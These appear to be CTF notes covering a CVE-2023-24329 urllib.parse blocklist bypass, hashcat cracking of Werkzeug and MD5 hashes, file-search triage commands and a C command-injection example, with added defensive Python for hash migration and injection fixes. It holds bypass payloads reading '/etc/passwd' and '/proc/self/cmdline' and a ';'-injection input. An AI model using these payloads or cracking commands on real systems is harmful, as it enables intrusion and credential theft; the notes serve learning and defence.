CTF Notes: 2024-04-28 CVE-2023-24329 RSA cracking CMD injection
CVE-2023-24329
To bypass: put a leading space before the URL (affected urllib.parse versions do not strip leading whitespace, so the parsed scheme and host come back empty and a blocklist built on them never matches).
e.g. given the following block list
blocked_list = [
"http://example.com/",
"http://example2.com/"
]
To bypass, the payload can be
" http://example.com/"
" file:///etc/passwd"
" file:///proc/self/cmdline"
" ftp://<username>:<password>@<domain-name>/<file-name>"
Generate an RSA (PEM) private key from an OpenSSH private key. Note that ssh-keygen -p rewrites private.key in place, so work on a copy; -N "" leaves the converted key without a passphrase.
> ssh-keygen -p -N "" -m pem -f private.key
Enter old passphrase: <enter-passphrase>
Key has comment '<comment>'
Your identification has been saved with the new passphrase.
Cracking hashes
- Python Werkzeug SHA256 (HMAC-SHA256 (key = $salt))
- Ref: https://hashcat.net/wiki/doku.php?id=example_hashes
30120 Python Werkzeug SHA256 (HMAC-SHA256 (key = $salt)) sha256$70108387805$8b9472281c36c3a693703de0
To crack
> hashcat -m 30120 hash_file wordlist_file
- MD5 given partial plaintext
Suppose an MD5 hash is given together with part of its plaintext
> hashcat hash_file -a 3 -m 0 -1 ?l?u?d?s PLAINTEXT?1?1?1
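For the Werkzeug item above, the following is an added example (not Werkzeug's own code and not from the original notes) that shows why mode 30120 cracks at raw-hash speed: the legacy `sha256$salt$hex` format is one HMAC-SHA256 keyed with the salt, with no work factor. The block verifies that format and migrates it to a PBKDF2 string in Werkzeug's `pbkdf2:sha256:<iterations>$salt$hex` layout on the next successful login. The iteration count, salt length and sample passwords are constructed for the example.

```python
"""Added example (not from the original notes): verify the legacy Werkzeug
`sha256$salt$hex` format and rehash it into a slow KDF on login."""
import hashlib
import hmac
import secrets
from typing import Optional, Tuple

# Constructed for this example (mirrors recent Werkzeug defaults, but assumed here).
PBKDF2_ITERATIONS = 600_000


def legacy_werkzeug_sha256(password: str, salt: str) -> str:
    """The legacy scheme: HMAC-SHA256(key=salt, msg=password), hex-encoded.
    One HMAC per guess is why this cracks at roughly plain-SHA256 speed."""
    digest = hmac.new(salt.encode("utf-8"), password.encode("utf-8"),
                      hashlib.sha256).hexdigest()
    return f"sha256${salt}${digest}"


def pbkdf2_sha256(password: str, salt: Optional[str] = None,
                  iterations: int = PBKDF2_ITERATIONS) -> str:
    """Slow replacement in Werkzeug's pbkdf2:sha256:<iterations>$salt$hex layout."""
    if salt is None:
        salt = secrets.token_hex(8)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 salt.encode("utf-8"), iterations).hex()
    return f"pbkdf2:sha256:{iterations}${salt}${digest}"


def verify(stored: str, password: str) -> bool:
    """Check `password` against either format with a constant-time compare."""
    parts = stored.split("$", 2)
    if len(parts) != 3:
        return False
    method, salt, _ = parts
    if method == "sha256":
        expected = legacy_werkzeug_sha256(password, salt)
    elif method.startswith("pbkdf2:sha256:"):
        iterations = int(method.rsplit(":", 1)[1])
        expected = pbkdf2_sha256(password, salt, iterations)
    else:
        return False
    return hmac.compare_digest(expected, stored)


def needs_rehash(stored: str) -> bool:
    """True for records still in the fast legacy format."""
    return stored.startswith("sha256$")


def login_and_migrate(stored: str, password: str,
                      iterations: int = PBKDF2_ITERATIONS) -> Tuple[bool, Optional[str]]:
    """Returns (ok, new_record). On a successful login against a legacy hash,
    new_record is the PBKDF2 string to write back; otherwise it is None."""
    if not verify(stored, password):
        return False, None
    if needs_rehash(stored):
        return True, pbkdf2_sha256(password, iterations=iterations)
    return True, None


if __name__ == "__main__":
    record = legacy_werkzeug_sha256("correct horse", "70108387805")  # constructed
    print("legacy record:", record)
    ok, migrated = login_and_migrate(record, "correct horse")
    print("login ok:", ok, "migrated to:", migrated)
```

Migration on login is the usual approach because the plaintext is only available at that moment; any records that never log in again should be invalidated rather than left in the legacy format.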
Useful search methods
- Find files modified since 2024-04-01 and exclude some paths
> find / -type f -newermt '2024-04-01' -not -path "/usr/*" -not -path "/sys/*" -not -path "/proc/*" -not -path "/run/*" -not -path "/boot/*" -not -path "/var/lib/*" -ls 2>/dev/null
- Find files owned by a user
> find / -type f -user <username> 2>/dev/null
- grep all files under a folder for a keyword, including gzip-compressed ones
> zgrep -i keyword /file/path/*.gz
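As an added example (not from the original notes), the triage walker below reproduces the first two find commands above in Python for hosts where GNU find (`-newermt`) is unavailable or where a sortable timeline is wanted: files under a root modified at or after a cutoff, with the notes' noisy path prefixes pruned and an optional owner filter standing in for `-user`. The exclusion list is copied from the find command; everything else is constructed here.

```python
"""Added example (not from the original notes): portable stand-in for
`find / -type f -newermt DATE -not -path ... -ls 2>/dev/null` and
`find / -type f -user UID`, returning a sortable timeline."""
import os
import stat
from datetime import datetime

# Exclusions copied from the find command in the notes, treated as path prefixes.
DEFAULT_EXCLUDES = ("/usr/", "/sys/", "/proc/", "/run/", "/boot/", "/var/lib/")


def recent_files(root, since, excludes=DEFAULT_EXCLUDES, owner=None):
    """Return [(mtime_iso, size, path), ...] for regular files under `root`
    modified at or after `since` (a naive local-time datetime), oldest first.
    `owner`, if given, is a numeric uid (the -user filter from the notes).
    Unreadable directories and files are skipped, like `2>/dev/null`."""
    excludes = tuple(excludes)
    cutoff = since.timestamp()
    found = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        # Prune excluded subtrees in place so os.walk never descends into them.
        dirnames[:] = [
            d for d in dirnames
            if not (os.path.join(dirpath, d) + os.sep).startswith(excludes)
        ]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: report symlinks as themselves
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue  # equivalent of -type f
            if st.st_mtime < cutoff:
                continue  # equivalent of -newermt
            if owner is not None and st.st_uid != owner:
                continue  # equivalent of -user
            when = datetime.fromtimestamp(st.st_mtime).isoformat(timespec="seconds")
            found.append((when, st.st_size, path))
    found.sort()
    return found


if __name__ == "__main__":
    for when, size, path in recent_files("/", datetime(2024, 4, 1)):
        print(when, size, path)
```

Because the output is sorted by modification time, it doubles as a crude filesystem timeline; remember that mtime is trivially forged with `touch`, so treat it as a lead rather than evidence on its own.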
cmd injection
A safe use of snprintf (the write is bounded and argv[1] is treated purely as data):
snprintf(buf, sizeof buf, "%s", argv[1]);
However, if the format string builds an OS command that is later handed to a shell (e.g. via system()), argv[1] becomes a command-injection (cmdi) vector:
snprintf(buf, sizeof(buf), "cmd -i %s", argv[1]);
// e.g. argv[1]: file_path;<cmd>  (the ';' ends the intended command and the shell runs <cmd> next)
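The following is an added example, written in Python rather than the notes' C and not code from the original page: the snprintf pattern above is the same shape as string-formatting a command line in any language, and the fixes are the same. `shell_tokens` uses shlex with `punctuation_chars=True` as a stand-in for how a POSIX shell splits the string, so the `;` from the note shows up as its own token. `cmd` is the placeholder program name from the notes; the path allowlist is constructed here.

```python
"""Added example (not from the original notes): the formatted-command defect
from the snprintf note, and its fixes, in Python. The formatting is memory-safe;
the injection happens when the string reaches a shell."""
import re
import shlex
import subprocess

PROGRAM = "cmd"  # placeholder from the notes, not a real program
# Constructed allowlist for a file-path argument: letters, digits, '_', '.', '/', '-'.
_SAFE_PATH = re.compile(r"[A-Za-z0-9_./-]+")


def build_shell_command(user_arg: str) -> str:
    """Vulnerable pattern, equivalent to snprintf(buf, n, "cmd -i %s", argv[1]):
    whatever is in user_arg lands verbatim in a string meant for system()."""
    return f"{PROGRAM} -i {user_arg}"


def shell_tokens(command_line: str) -> list:
    """Split the way a shell would, treating ; | & < > ( ) as separate tokens,
    to make visible where the intended command ends and the injected one starts."""
    return list(shlex.shlex(command_line, punctuation_chars=True))


def quoted_shell_command(user_arg: str) -> str:
    """Fallback when a shell really is unavoidable: quote the argument so the
    shell sees every metacharacter as literal text."""
    return f"{PROGRAM} -i {shlex.quote(user_arg)}"


def validated_argv(user_arg: str) -> list:
    """Preferred fix: validate against an allowlist, then build an argv list for
    subprocess with shell=False. The argument is one token whatever it contains;
    a leading '-' is rejected so it cannot be parsed as an option by PROGRAM."""
    if not _SAFE_PATH.fullmatch(user_arg) or user_arg.startswith("-"):
        raise ValueError(f"rejected unsafe argument: {user_arg!r}")
    return [PROGRAM, "-i", user_arg]


def run_validated(user_arg: str) -> int:
    """Run PROGRAM without a shell and return its exit status."""
    return subprocess.run(validated_argv(user_arg), shell=False, check=False).returncode


if __name__ == "__main__":
    tainted = "file_path;id"  # constructed input in the shape of the note's payload
    print(shell_tokens(build_shell_command(tainted)))   # ';' becomes its own token
    print(shell_tokens(quoted_shell_command(tainted)))  # quoting keeps it one token
    try:
        validated_argv(tainted)
    except ValueError as exc:
        print(exc)
```

Of the two fixes, the argv list is the one to reach for: it removes the shell from the picture entirely, and the allowlist then only has to protect the invoked program from argument-level surprises such as option-looking values, not from shell parsing.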
Support meowmeow
If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack